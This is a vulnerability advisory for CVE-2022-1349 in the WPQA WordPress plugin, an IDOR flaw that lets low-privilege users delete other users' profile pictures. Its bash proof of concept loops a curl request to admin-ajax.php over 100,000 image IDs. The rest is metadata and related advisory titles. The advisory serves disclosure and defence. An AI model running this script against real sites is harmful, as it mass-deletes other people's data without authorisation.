WPQA < 5.2 – Subscriber+ Arbitrary Profile Picture Deletion via IDOR | CVE 2022-1349 | Plugin Vulnerabilities

Description

The plugin, used as a companion plugin for the Discy and Himer themes, does not validate that the value passed to the image_id parameter of the ajax action wpqa_remove_image belongs to the requesting user, allowing any users (with privileges as low as Subscriber) to delete the profile pictures of any other user.

Proof of Concept

#!/bin/bash
nonce=aae369a8e3
for i in {1..100000};
do
curl 'https://vulnerable.website/wp-admin/admin-ajax.php' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: something=something' --data-raw 'action=wpqa_remove_image&wpqa_remove_image='$nonce'&image_name=you_avatar&image_type=user_meta&meta_id=6723&image_id='$i;
done

Affects Plugins

Fixed in 5.2

References

CVE

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Binit Ghimire

Submitter

Binit Ghimire

Submitter website

https://WHOISbinit.me/

Submitter twitter

Verified

Yes

WPVDB ID

7ee95a53-5fe9-404c-a77a-d1218265e4aa

Timeline

Publicly Published

2022-04-21 (about 3 years ago)

Added

2022-04-21 (about 3 years ago)

Last Updated

2022-04-22 (about 3 years ago)

Other

Published

Title

Published

2024-10-24

Title

Comments – wpDiscuz < 7.6.25 - Authentication Bypass

Published

2024-07-11

Title

MStore API – Create Native Android & iOS Apps On The Cloud < 4.15.0 - Authentication Bypass

Published

2023-05-17

Title

MStore API < 3.9.1 - Authentication Bypass

Published

2023-06-04

Title

WP User Switch < 1.0.3 - Subscriber+ Authentication Bypass

Published

2018-01-24

Title

Email Subscribers & Newsletters < 3.4.8 - Unauthenticated Subscriber Download